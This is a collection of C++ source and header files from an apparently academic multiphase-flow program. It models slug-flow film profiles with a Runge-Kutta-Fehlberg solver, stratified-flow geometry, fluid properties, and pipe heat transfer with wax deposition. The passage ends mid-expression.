		x = (VTb - VLLS)*RhoL*0.25*Pi*ID*ID*HLLS;
		VLLS = ((VSL + VSG) - VGLS * (1 - HLLS)) / HLLS;
		RhoS = RhoL * HLLS + RhoG * (1 - HLLS);
		MuS = MuL * HLLS + MuG * (1 - HLLS);
		//In this "for loop", axial locations are iterated
		for (zLoop = 0; zLoop < 4000; zLoop++) {
			if (z >= TotalZ) {
				break;
			}
			XxAtZ = hF;
			F = hFdZ(hF);
			hminCondition = 0;
			//This is RK45 (Runge-Kutta-Fehlberg) step-size selection:
			//shrink/grow h until the embedded error estimate passes.
			for (int RKFLoop = 1; RKFLoop < 1000; RKFLoop++) {
				h = h * StepRatio;
				if (h > hMax) {
					h = hMax;
				}
				if (h < hMin) {
					h = hMin;
					hminCondition = 1;
				}
				if (z + h >= TotalZ) {
					h = TotalZ - z;
				}
				//Cal KK1
				xx = hF;
				F = hFdZ(hF);
				KK[0] = F;
				//Cal KK2
				xx = XxAtZ + h / 4.0*KK[0];
				F = hFdZ(xx);
				KK[1] = F;
				//Cal KK3
				xx = XxAtZ + h * (3.0 / 32.0*KK[0] + 9.0 / 32.0*KK[1]);
				F = hFdZ(xx);
				KK[2] = F;
				//Cal KK4
				xx = XxAtZ + h * (1932.0 / 2197.0*KK[0] - 7200.0 /
					2197.0*KK[1] + 7296.0 / 2197.0*KK[2]);
				F = hFdZ(xx);
				KK[3] = F;
				//Cal KK5
				xx = XxAtZ + h * (439.0 / 216.0*KK[0] - 8.0*KK[1] + 3680.0 /
					513.0*KK[2] - 845.0 / 4104.0*KK[3]);
				F = hFdZ(xx);
				KK[4] = F;
				//Cal KK6
				xx = XxAtZ + h * (-8.0 / 27.0*KK[0] + 2.0*KK[1] - 3544.0 / 2565.0*KK[2]
					+ 1859.0 / 4104.0*KK[3] - 11.0 / 40.0*KK[4]);
				F = hFdZ(xx);
				KK[5] = F;
				//Embedded 4th/5th-order error estimate.
				ERK4 = abs(h*(KK[0] / 360.0 - 128.0 / 4275.0*KK[2] - 2197.0 / 75240.0*
					KK[3] + KK[4] / 50.0 + 2.0 / 55.0*KK[5]));
				ERKFVal = ERK4;
				if (ERKFVal != 0) {
					StepRatio = pow((abs(RKFEps*h / 2.0 / ERKFVal)), 0.25);
				}
				else {
					StepRatio = 1.25;
				}
				if (StepRatio < 0.05) {
					StepRatio = 0.05;
				}
				if (StepRatio >= 1.0) {
					break;
				}
				if (RKFLoop > 999) {
					std::cout << "WRONG";
				}
			}
			//At one specific axial location, hF is calculated (5th-order update)
			XxAtZ = XxAtZ + h * (16.0 / 135.0*KK[0] + 6656.0 / 12825.0*KK[2] +
				28561.0 / 56430.0*KK[3] - 9.0 / 50.0*KK[4] + 2.0 / 55.0*KK[5]);
			hF = XxAtZ;
			z = z + h;
			hFArray.push_back(hF);
			zArray.push_back(z);
			Sum = 0;
			Flag = 0;
			Sum2 = 0;
			Sum3 = 0;
			SumHfAvg = 0;
			//Integrate holdup over the profile computed so far.
			for (int jj = 1; jj < zLoop + 2; jj++)
			{
				if (zLoop == 10)
				{
					//NOTE(review): dead debug hook (no effect).
					double a;
					a = 1;
				}
				//HLTB is calculated for each predicted hF
				if (jj > 0) {
					HLTBPrev = (1 / Pi)*(Pi - acos(2 * (hFArray[jj - 1]) / ID - 1) + (2 * (hFArray[jj - 1]) / ID - 1)*pow(1 - pow(2 * (hFArray[jj - 1]) / ID - 1, 2), 0.5));;
				}
				else {
					HLTBPrev = 0;
				}
				HLTB = (1 / Pi)*(Pi - acos(2 * (hFArray[jj]) / ID - 1) + (2 * (hFArray[jj]) / ID - 1)*pow(1 - pow(2 * (hFArray[jj]) / ID - 1, 2), 0.5));
				HLTB = (HLTB + HLTBPrev) / 2.0;
				hFAvg = (hFArray[jj] + hFArray[jj - 1]) / 2.0;
				//Integral in mass balance relation
				Sum = Sum + RhoL * Pi * ID*ID*0.25*HLTB*(zArray[jj] - zArray[jj - 1]);
				//To calculate the average HLTB
				Sum2 = Sum2 + HLTB * (zArray[jj] - zArray[jj - 1]);
				SumHfAvg = SumHfAvg + hFAvg * (zArray[jj] - zArray[jj - 1]);
				//Sum3 = Sum3 + (VTb / Lu)*(1 - HLTB)*(zArray[jj] - zArray[jj - 1]);
			}
			//Simpson-like (two interior points) method for average HLTB
			double SumNew = 0;
			for (int jj = 1; jj < zLoop +2; jj++)
			{
				double HLTBNew = (1 / Pi)*(Pi - acos(2 * (hFArray[jj]) / ID - 1) +
					(2 * (hFArray[jj]) / ID - 1)*pow(1 -
						pow(2 * (hFArray[jj]) / ID - 1, 2), 0.5));
				double HLTBPast = (1 / Pi)*(Pi - acos(2 * (hFArray[jj-1]) /
					ID - 1) + (2 * (hFArray[jj-1]) / ID - 1)*
					pow(1 - pow(2 * (hFArray[jj-1]) / ID - 1, 2), 0.5));
				HLTB = (HLTBPast + HLTBNew) / 2.0;
				double m = (HLTBNew - HLTBPast) / (zArray[jj] - zArray[jj-1]);
				double x1, x2, x3;
				double y1, y2, y3;
				x1 = zArray[jj-1] + (zArray[jj] - zArray[jj - 1]) / 3.0;
				y1 = m * x1 - m * zArray[jj-1] + HLTBPast;
				x2 = x1 + (zArray[jj] - zArray[jj - 1]) / 3.0;
				y2 = m * x2 - m * zArray[jj-1] + HLTBPast;
				Sum3 = Sum3 + (VTb / Lu)*(1 - HLTB)*(zArray[jj] - zArray[jj - 1]);
				SumNew = SumNew + ((zArray[jj] - zArray[jj - 1]) / 6.0)*
					(HLTBPast + 2 * y1 + 2 * y2 + HLTBNew);
			}
			//Average film holdup from the quadrature above
			HLTBAvg=SumNew / Lf;
			StratifiedFlowGeometry Geom(HLTBAvg,ID);
			hFAvg = Geom.hLTilt*ID;
			//Calculated mass flow rate
			WLCal = (RhoL * (Ls)*Pi * ID*ID*0.25*HLLS + RhoL * Pi *
				ID*ID*0.25*HLTBAvg*Lf)*(VTb / Lu) - x;
			//Error calculation of calculated mass flow rate and input mass flow rate
			Eps = WLCal - WL;
			Eps2 = VSL - VLLS * HLLS - VTb * (1 - HLLS)*Lf / Lu + Sum3;
			//Average liquid film holdup
			//HLTBAvg = Sum2 / Lf;
			//hFAvg = SumHfAvg / Lf;
			if (Con == 1) {
				std::cout << std::endl;
			}
		}
		//Film/gas actual velocities from the converged average holdup.
		VLTB = VTb - (VTb - VLLS)*HLLS / HLTBAvg;
		VGTB = VTb - (VTb - VGLS)*(1 - HLLS) / (1 - HLTBAvg);
		//HLLS calculation from Zhang 2003
		fS = FannningFrictionFactor(RhoS, Vm, ID, MuL, PipeRoughness);
		Tsm = (2.0 / 2.5)*(0.5*fS*RhoS*Vm*Vm + 0.25*ID*RhoL*HLTBAvg*
			(VTb - VLTB)*(Vm - VLTB) / Ls);
		HLLS = 1 / (1 + (Tsm / (3.16*pow((RhoL - RhoG)*g*IT, 0.5))));
		//Comparing newly calculated HLTBAvg from the new HLLS with HLTBAvg
		//from previous iteration and HLLS
		HLTBComparison = abs(PreVal - HLTBAvg);
		PreVal = HLTBAvg;
		z = 0;
	}
	ZSize = zLoop;
	return(Eps);
}
//In this method, the right Lf will be chosen so the mass is conserved
//In other words, by this method, correct film length is calculated
//I used bisection method for soliving for the root
//the two values of negative and positive values shoudl be checked for each case
double FilmProfile::LfDetermination(double InitialGuess,double dx, double Epsilon,
double hMax, double EpsilonZh) {
double Lf = 16, Eps = 10;;
double F = 10;
double err1 = 10;
double check;
double x,FPrime = 0;
x = InitialGuess;
err=hFDetermination(x, hMax, EpsilonZh);
err = 10;
while (err > Epsilon)
{
FPrime = (hFDetermination(x + dx,hMax, EpsilonZh) -
hFDetermination(x, hMax, EpsilonZh)) / dx;
x = x - hFDetermination(x, hMax, EpsilonZh) / FPrime;
err = abs(hFDetermination(x, hMax, EpsilonZh));
}
err = hFDetermination(x, hMax, EpsilonZh);
return(x);
}
void FilmProfile::HyrodynamicProperties(double InitialGuess, double dx,
double Epsilon, double hMax,
double EpsilonZh) {
XSave.clear();
HLTBSave.clear();
std::ofstream output;
output.open("Output.txt");
LfFinal = LfDetermination(InitialGuess,dx,Epsilon, hMax, EpsilonZh);
hFDetermination(LfFinal, hMax,EpsilonZh);
StratifiedFlowGeometry Geo(HLTBAvg,ID);
output << "Calculated Error: " << err << std::endl;
output << "Pressure: " << P / 6894.76 << " Psia" << std::endl;
output << "Liquid superficial velocity (VSL): " << VSL << " m/s" << std::endl;
output << "Gas superficial velocity (VSG): " << VSG << " m/s" << std::endl;
output << "Liquid density: " << RhoL << " kg/m3" << std::endl;
output << "Gas density: " << RhoG << " kg/m3" << std::endl;
output << "Liquid viscosity: " << MuL << " Pa.s" << std::endl;
output << "Gas viscosity: " << MuG << " Pa.s" << std::endl;
output << "Liquid film holdup: " << HLTBAvg << std::endl;
output << "Liquid slug holdup: " << HLLS << std::endl;
output << "SL: " << (Geo.SLTilt)*ID << " m" << std::endl; //0.16485 0.06954
output << "SI: " << Geo.SITilt*ID << " m" << std::endl;
output << "Film velocity (Lf): " << VLTB << " m/s" << std::endl;
output << "Gas core velocity (Vg): " << VTb - (VTb - VGLS)*(1 - HLLS) /
(1 - HLTBAvg) << " m/s" << std::endl;
output << "Unit slug length (Lu): " << LfFinal+Ls << " m" << std::endl;
output << "Film length (Lf): " << LfFinal << " m" << std::endl;
output << "Slug length (Ls): " << Ls << " m" << std::endl;
output << std::endl;
output << "Z " << "HLTB: " << std::endl;
for (int j = 0; j < ZSize + 1; j++) {
HLTB = (1 / Pi)*(Pi - acos(2 * (hFArray[j]) / ID - 1) + (2 * (hFArray[j])
/ ID - 1)*pow(1 - pow(2 * (hFArray[j]) / ID - 1, 2), 0.5));
output << zArray[j] << " " << HLTB << std::endl;
XSave.push_back(zArray[j]);
HLTBSave.push_back(HLTB);
}
}
}//namespace MultiphaseTemperature
//Some formulas for Frequency::
//Freq = 0.0226*(pow((VSL / gEnglish / ID), (1.2)))*(pow((212.6 / (VSL + VSG) / 3.28084 + (VSL + VSG)*3.28084), (1.2)))*(0.836);
//double Freq = 0.19;
//Freq = exp(0.8 + 1.53*log(VSL / 0.36) + 0.27*((VSG / (1 - 0.36)) - VSL / 0.36) / Vm - 34.1*ID);
//Freq = 0.0226*pow((VSL / g / ID)*(19.75 / Vm + Vm), 1.2);
//Freq = 0.8428*pow((VSL / g / (ID * 1000))*(19.75 / Vm + Vm), 0.25);
//Freq = 0.0364*(VSL / Vm)*pow(2.02 / ID + Vm * Vm / g / ID, 1.06); //Not good
//Freq = 0.47*pow(VSL, 0.75) / (pow(ID, 1.2)*pow(0.3048 * 53, 0.55)); //Not good
//Freq = exp(0.8 + 1.53*log(VSL / HLTB) + 0.27*(VTb / Vm) - 34.1*ID); //Not too bad
//Freq = 2.623*(VSL / ID)*(1 / pow(pow(ID, 3.0 / 2.0)*pow(RhoL*(RhoL - RhoG)*g, 0.5) / MuL, 0.612)); //hugely underestimated
//Freq = 0.61 - (RhoG - VSG / (1 - 0.36)) / (RhoL*(ID - 0.36*ID)); //Not good
//Freq = 0.088*(VSL + 1.5)*(VSL + 1.5) / g / ID; //Overestimated
//Freq = 1.2*VSL / (32 * ID);
//Lu = VTb / Freq;
<file_sep>#ifndef CorrectHydroProps_H
#define CorrectHydroProps_H
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "dPCalculation.h"
#include "SlugFlowHeatTransfer.h"
namespace MultiphaseTemperature
{
class SPModel
{
public:
std::vector<std::vector<std::vector<std::vector<double>>>>TwWithHydroUpdate;
std::vector<std::vector<double>> TSWithHydroUpdate;
std::vector<std::vector<double>> TLWithHydroUpdate;
std::vector<std::vector<double>> TGWithHydroUpdate;
std::vector<std::vector<double>> hHot;
std::vector<std::vector<std::vector<double>>> KDepo;
//This vector contains the r_ref*U_ref parameter for the over heat transfer calculation
std::vector<double> ru;
/*In this method, the temperature distribution is estimated using
the correct hydrodynamic update after one T_u*/
double TForHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg,
std::vector<std::vector<double>> SlugFilmAssign,
std::vector<double>& q, int Nx, double Tm);
void SlugHeatTransferWithHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg,
std::vector<std::vector<double>> SlugFilmAssign,
std::vector<double>& q, int Nx, int NTime, double Tm);
void RrefUref(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<std::vector<double>> SlugFilmAssign,
std::vector<double>& q, int Nx, int NTime, double Tm);
double FrictionFactorAnnulus(double Rho, double V, double dpOut, double danIn, double Mu);
double NuxGn(double Rho, double v, double dpOut, double danIn,
double Mu, double Cp, double K, double dx);
};
} //End of namespace MultiphaseTemperature
#endif
<file_sep>#ifndef CaseSpecificInputs_H
#define CaseSpecificInputs_H
#include<cmath>
#include <iostream>
namespace user {
class FluidProperties {
double T;
double P;
double MW = 17.68358;
public:
FluidProperties(double T, double P);
class Liquid {
public:
double T;
double P;
double MW;
FluidProperties *container;
void SetContainer(FluidProperties &container);
void Render(void);
//T should be Kelvin, P is 350 Psig
double Cp(FluidProperties &container);
//At 350 Psig ONLY
double Rho(FluidProperties &container);
double Mu(FluidProperties &container);
double STG(FluidProperties &container);
double K(FluidProperties &container);
};
class Gas {
public:
double T;
double P;
//In this parameter is manually put here. (Be carefull)
double MW = 17.68358;
FluidProperties *container;
void SetContainer(FluidProperties &container);
void Render(void);
double Z(FluidProperties &container);
double Cp(FluidProperties &container);
double Rho(FluidProperties &container);
//At 350 psig pressure ONLY
double Rho2(FluidProperties &container);
double Mu(FluidProperties &container);
double K(FluidProperties &container);
};
Liquid Liquid;
Gas Gas;
};
class PipeGeometry {
public:
double Roughness = 0.0018*0.0254; //Meter
double IDPipe = 2.067*0.0254; //Meter
double ODPipe = 2.375*0.0254; //Meter
double KPipe = 16;//w/m/k
//https://www.engineersedge.com/materials/specific_heat_capacity_of_metals_13259.htm
double CPPipe = 502.416; //J/Kg/K
//https://www.engineeringtoolbox.com/steel-pipes-dimensions-d_43.html
double RhoPipe = 7835.34367; //Kg/m3 (3.65 lb/ft) / (0.007462024 ft2)
double IDJacket = 3.826*0.0254;
double ODJacket = 4.5*0.0254;
//Seems test length
double Length = 0.3048 * 53;
};
}//namespace user {
#endif
<file_sep>#ifndef SlugFlowFilmProfile_H
#define SlugFlowFilmProfile_H
#include <cmath>
#include <iostream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
namespace MultiphaseTemperature {
//Please note the following class is for horizontal case
//however, it can easily be modified for inclined case
class FilmProfile {
private:
double Pi = 3.14159265358979;//Pi number
double ID, OD, VSG, VSL, T, P, PipeRoughness, RhoL, RhoG, MuL, MuG,C0, g, RhoS, MuS, IT;
int k;
int Con;
double Tol = 0.001;
int Flag2;
double hFdZ(double hF);
double hFDetermination(double Lf, double hMax, double EpsilonZh);
double LfDetermination(double InitialGuess, double dx, double Err,
double hMax, double EpsilonZh);
public:
//These arrays are used to store hf and z values
std::vector<double>zArray, hFArray;
//double hFArray[1000], zArray[1000];
//Final error
double err = 10;
double VLTB, VGTB, VLLS, VGLS, Vm, VTb;
double HLLS, LfFinal, Ls, HLTB,HLTBAvg;
double hFAvg;
int ZSize;
FilmProfile(std::vector < double > & FilmProfileInputs);
double FannningFrictionFactor(double Rho, double V, double d, double Mu,
double Roughness);
void HyrodynamicProperties(double InitialGuess, double dx, double Epsilon,
double hMax, double EpsilonZh);
double hFCritical(double hF);
double hFCriticalDetermination();
//void ReportParams();
friend class SlugFLowHeatTransferCal;
std::vector<double> XSave;
std::vector<double> HLTBSave;
double CalculatedError;
double AvgFilmHoldUp_HLTB;
double AvgSlugHoldUp_HLLS;
double FilmVelocity_VLTB;
double GasCoreVelocity_Vg;
double UnitSlugLength_Lu;
double FilmLength_Lf;
double SlugLength_Ls;
};
}//namespace MultiphaseTemperature
#endif
<file_sep>#define _USE_MATH_DEFINES
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include <math.h>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
#include "CorrectHydroProps.h"
namespace MultiphaseTemperature
{
double SPModel::TForHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& q,
int Nx, double Tm)
{
double LfPre, LfCurr = 1000;
double Temp=302;
double AvgTBK = Tm;
double EpsLf;
for (int kL = 0; kL < 100; kL++)
{
//Hydrodynamic properties calculation
LfPre = LfCurr;
SlugFLowHeatTransferCal SFHT;
SFHT.SlugFlowHeatModel(SlugFLowHeatTransferCalInputs, WaxVector, WaxSolidFraction,
HydroInputs,TwInitial,Ts,Tf,Tg, q,Nx, Nx, Temp);
Temp = SFHT.AvgTBK;
SFHT.HydroUpdate(HydroInputs, Temp);
LfCurr = SFHT.Lf;
EpsLf = abs(LfCurr - LfPre);
if (EpsLf < 0.001) {
break;
}
}
return(Temp);
}
void SPModel::SlugHeatTransferWithHydroUpdate(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& q,
int Nx, int NTime, double Tm)
{
TwWithHydroUpdate.clear();
TSWithHydroUpdate.clear();
TGWithHydroUpdate.clear();
TLWithHydroUpdate.clear();
KDepo.clear();
hHot.clear();
double CorrectTemp;
CorrectTemp = TForHydroUpdate(SlugFLowHeatTransferCalInputs, WaxVector, WaxSolidFraction, HydroInputs,
TwInitial, Ts, Tf, Tg, q, Nx, Tm);
SlugFLowHeatTransferCal SFHT;
SFHT.SlugFlowHeatModel(SlugFLowHeatTransferCalInputs, WaxVector, WaxSolidFraction,
HydroInputs, TwInitial, Ts, Tf, Tg, q, Nx, Nx, CorrectTemp);
TwWithHydroUpdate = SFHT.TwSave;
TSWithHydroUpdate = SFHT.TSSave;
TGWithHydroUpdate = SFHT.TGSave;
TLWithHydroUpdate = SFHT.TLSave;
KDepo=SFHT.KDepoSave;
hHot=SFHT.hHotSave;
TwInitial = SFHT.Tw;
Ts = SFHT.TS;
Tf = SFHT.TL;
Tg = SFHT.TG;
}
//Gnielinski(2009), friction factor in the annulus
double SPModel::FrictionFactorAnnulus(double Rho, double V, double dpOut,
double danIn, double Mu) {
double Dhyd = danIn - dpOut;
double Re,ReStar, a;
double ans;
a = dpOut / danIn;
Re = Rho * V*Dhyd / Mu;
ReStar = Re * ((1 + a * a)*log(a) + 1 - a * a) / ((1 - a * a)*log(a));
ans = pow(1.8*log10(ReStar) - 1.5, -2.0);
return(ans);
}
//k is assumed to be 1, Not accurate
double SPModel::NuxGn(double Rho, double v, double dpOut, double danIn,
double Mu, double Cp, double K, double dx)
{
double ans;
double Dhyd = danIn - dpOut;
double Re = Rho * v*Dhyd / Mu;
double Pr = Mu * Cp / K;
double a = dpOut / danIn;
double Fan = 0.75*pow(a, -0.17);
double k1;
double friction;
k1 = 1.07 + 900.0 / Re - 0.63 / (1 + 10 * Pr);
friction = FrictionFactorAnnulus(Rho, v,dpOut,danIn,Mu);
ans = (friction / 8.0*Pr*Re)*(1 + pow(Dhyd / dx, 2.0 / 3.0))*(Fan) /
(k1 + 12.7*pow(friction / 8.0, 0.5)*(pow(Pr, 2.0 / 3.0) - 1));
return(ans);
}
void SPModel::RrefUref(std::vector<double>& SlugFLowHeatTransferCalInputs,
std::vector<std::vector<double>>& WaxVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& q,
int Nx, int NTime, double Tm)
{
//By this method, the slug flow heat tranfser calcualtion is performed and
//TS, TG, TL, Tw and nusslet number is calcuated with correct
SlugHeatTransferWithHydroUpdate(SlugFLowHeatTransferCalInputs, WaxVector,
WaxSolidFraction, HydroInputs, TwInitial, Ts, Tf, Tg, q, Nx, NTime, Tm);
}
} //end of namespace MultiphaseTemperature
<file_sep>#include "StratifiedFlowGeometry.h"
#include "CaseSpecificInputs.h"
#include <iostream>
#include <cmath>
namespace MultiphaseTemperature {
//In this constructor please note that we want to calculate liquid height (hL).
//h is the liquid holdup. One should make sure to know the differences between the two
//h=AL/AP, by knowing this relationship, we can calculate AL and then calculate hL
StratifiedFlowGeometry::StratifiedFlowGeometry(double H,double IDEffective) {
user::PipeGeometry Pipe;
ID = IDEffective;
double AP = 0.25*ID * ID*Pi;
double hh = H * ID;
double AL = H * AP;
double hLTi;
double Eps = 10;
double dx = 0.000000001;
double F, FPlusdx, FPrime;
while (Eps > 0.00000001)
{
F = ID * ID*(0.25*(Pi - acos(2 * (hh / ID) - 1) +
(2 * (hh / ID) - 1)*pow(1 - pow(2 * (hh / ID) - 1, 2), 0.5))) - H * AP;
FPlusdx = ID * ID*(0.25*(Pi - acos(2 * ((hh + dx) / ID) - 1) +
(2 * ((hh + dx) / ID) - 1)*pow(1 - pow(2 * ((hh + dx) / ID)
- 1, 2), 0.5))) - H * AP;
FPrime = ((FPlusdx)-(F)) / dx;
hh = hh - F / FPrime;
Eps = F;
}
H = hh;
hL = H;
A = Pi * ID*ID*0.25;
hLTilt = hL / ID;
SGTilt = acos(2 * hLTilt - 1);
SLTilt = Pi - acos(2 * hLTilt - 1);
SITilt = pow(1 - pow(2 * hLTilt - 1, 2), 0.5);
AGTilt = 0.25*(acos(2 * hLTilt - 1) - SITilt * (2 * hLTilt - 1));
ALTilt = 0.25*(Pi - acos(2 * hLTilt - 1) +
(2 * hLTilt - 1)*pow(1 - pow(2 * hLTilt - 1, 2), 0.5));
dL = 4.0 * ALTilt*ID*ID / (SLTilt*ID);
dG = 4.0 * AGTilt*ID*ID / (SITilt*ID + SGTilt * ID);
if (hL < 0.5*ID)
{
Theta = 2 * acos((0.5*ID - hL) / (0.5*ID));
}
else if (hL == 0.5*ID) {
Theta = Pi;
}
else {
Theta = Pi + 2 * asin((hL - 0.5*ID) / (0.5*ID));
}
}
}//namespace MultiphaseTemperature {<file_sep>#define _USE_MATH_DEFINES
#include <iostream>
#include <chrono>
#include <cmath>
#include <vector>
#include <iomanip>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include "SlugFlowHeatTransfer.h"
#include "dPCalculation.h"
#include "OveralHeatTransfer.h"
#include <omp.h>
//namespace MultiphaseTemperature {
int main() {
double a;
user::PipeGeometry Pipe;
int Nx=50, NTime=1000;
double T = 29+273.15;
double P = (14.7+350)*6894.76;
double VSG =1*0.305515;
double VSL =4*0.305515;
//ID should be an input parameter for slugfilm but not for heat transfer
double ID = Pipe.IDPipe;
double Roughness = 0.00004572;
double IT = 0.025;
double TInitial = 302;
double InitialGuess =0.1, dx = 0.01, Epsilon = 0.01, hMax =0.1, EpsilonZh = 0.001;
user::FluidProperties Fluid(T, P);
std::vector<double> FilmInputs;
std::vector<double> HydroInputs;
std::vector<double> HeatInputs;
std::vector<std::vector<double>> WaxThickness;
std::vector<std::vector<double>> WaxFraction;
std::vector<double> q;
std::vector<double> TS;
std::vector<double> TL;
std::vector<double> TG;
std::vector<bool> SlugFlow;
std::vector<double> HLTbLocation;
//Initial condition assignment
std::vector<std::vector<std::vector<double>>>Tw;
Tw.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++) //To include the initial condtion as contant temperature
{
Tw[xx].resize(4 + 1);
for (int WL = 1; WL < 4 + 1; WL++) //starts from 1 to 3
{
Tw[xx][WL].resize(4 + 1);
for (int RS = 1; RS < 4 + 1; RS++) //starts from 1 to 4
{
//***************************Possible modifications are requried
/*It is assumed that inlet temperature is constant and it is equal
to T at t=0 everywhere. Later this assumption should be substitute
with pipe-in-pipe counter courent flow */
Tw[xx][WL][RS] = TInitial;
}
}
TL.push_back(TInitial);
TG.push_back(TInitial);
TS.push_back(TInitial);
q.push_back(8.0);
}
WaxThickness.resize(Nx + 1);
WaxFraction.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++)
{
WaxFraction[xx].resize(5);
WaxFraction[xx][1] = 0.001/* + double(xx) / double(Nx) * 0.5*0.04*/;
WaxFraction[xx][2] = 0.001/*WaxFraction[xx][1] - WaxFraction[xx][1] * 0.1*/;
WaxFraction[xx][3] = 0.001/* WaxFraction[xx][1] - WaxFraction[xx][1] * 0.2*/;
WaxFraction[xx][4] = WaxFraction[xx][2];
WaxThickness[xx].resize(5);
WaxThickness[xx][1] = 0.0005 /*+ double(xx) / double (Nx) * 0.5*0.001*/;
WaxThickness[xx][2] = WaxThickness[xx][1] /*- WaxThickness[xx][1] * 0.1*/;
WaxThickness[xx][3]= WaxThickness[xx][1] /*- WaxThickness[xx][1] * 0.2*/;
WaxThickness[xx][4] = WaxThickness[xx][2];
}
//FilmInputs, WaxWidthVector, WaxSolidFraction, HydroInputs, TwInitial,
// Ts, Tf, Tg, FilmAssign,
// SlugAssign, q, NxInput, Tm, TInlet
FilmInputs.clear();
HydroInputs.clear();
FilmInputs.push_back(VSL); FilmInputs.push_back(VSG);
FilmInputs.push_back(ID); FilmInputs.push_back(T-273.15); //T has to be in C
FilmInputs.push_back(P); FilmInputs.push_back(Roughness);
FilmInputs.push_back(IT);
HydroInputs.push_back(InitialGuess); HydroInputs.push_back(dx);
HydroInputs.push_back(Epsilon); HydroInputs.push_back(hMax);
HydroInputs.push_back(EpsilonZh);
double TCorr;
MultiphaseTemperature::SlugFLowHeatTransferCal OBJ;
OBJ.HydroUpdate(FilmInputs, HydroInputs);
SlugFlow.resize(Nx+1);
HLTbLocation.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++)
{
SlugFlow[xx] = false;
HLTbLocation[xx] = false;
if (xx <= (OBJ.NxF - 1))
{
SlugFlow[xx] = false;
HLTbLocation[xx] = OBJ.HLTBOrgNew[xx];
}
if (xx >(OBJ.NxF - 1))
{
SlugFlow[xx] = true;
}
//s1 = HLTbLocation[xx]; s2 = SlugFlow[xx];
}
double ch;
MultiphaseTemperature::SlugFlowOveralHeatTranfer obj2;
ch=obj2.AvgTempForHydroUpdate(FilmInputs, WaxThickness,
WaxFraction, HydroInputs,
Tw, TS, TL, TG, HLTbLocation,
SlugFlow, q, 302.15,0.001);
auto start_time = std::chrono::high_resolution_clock::now();
auto end_time = std::chrono::high_resolution_clock::now();
std::cout << "The total program run-time in milliseconds is ";
std::cout << std::chrono::duration_cast<std::chrono::milliseconds>(
end_time - start_time).count() << '\n';
std::system("pause");
}
<file_sep>#include <iostream>
#include <cmath>
#include "CaseSpecificInputs.h"
namespace user {
FluidProperties::FluidProperties(double Temp, double Press) {
T = Temp + 273.15;
P = Press;
}
//Liquid properties
void FluidProperties::Liquid::SetContainer(FluidProperties &container)
{
this->container = &container;
}
void FluidProperties::Liquid::Render(void)
{
T = container->T;
P = container->P;
}
//Checked
double FluidProperties::Liquid::Cp(FluidProperties &container)
{
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(2.0819*TF + 1.8858 * 1000); //very good accuracy
} //T should be Kelvin, P is 350 Psig
//Checked
double FluidProperties::Liquid::Rho(FluidProperties &container)//At 350 Psig ONLY
{//[kg/m3]
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(-3.963*0.1*TF + 8.586 * 100);
}
//Checked
double FluidProperties::Liquid::Mu(FluidProperties &container)
{
//kg/(m s)
this->container = &container;
Render();
double TR = T * 9.0 / 5.0;//Rankin
double a = -3.9932*log10(TR) + 10.7408;
double ans = (Rho(container) / 1000.0)*(pow(10, pow(10, a)) - 0.7);
return(ans / 1000.0);
}
//Surface tension between gas and liquid (RR)
//Not reliable
double FluidProperties::Liquid::STG(FluidProperties &container)
{
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(pow(10, -3)*(-1.5667*pow(10, -2)*TF + 1.7666 * 10));
}
//Thermal conductivit of liquid phase
double FluidProperties::Liquid::K(FluidProperties &container)
{
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(-2.998*pow(10, -4.0)*TF + 2.0954*0.1);
}
void FluidProperties::Gas::SetContainer(FluidProperties &container)
{
this->container = &container;
}
void FluidProperties::Gas::Render(void)
{
T = container->T;
P = container->P;
}
//Checked!
double FluidProperties::Gas::Z(FluidProperties &container)
{
this->container = &container;
Render();
double gamma = MW / 28.9625;
double Ppsi = (P) / 6894.7572932;//PsiA
Ppsi = Ppsi - 14.7;//psig
return(1 / (1 + (Ppsi * 344400 * pow(10, 1.785*gamma)) /
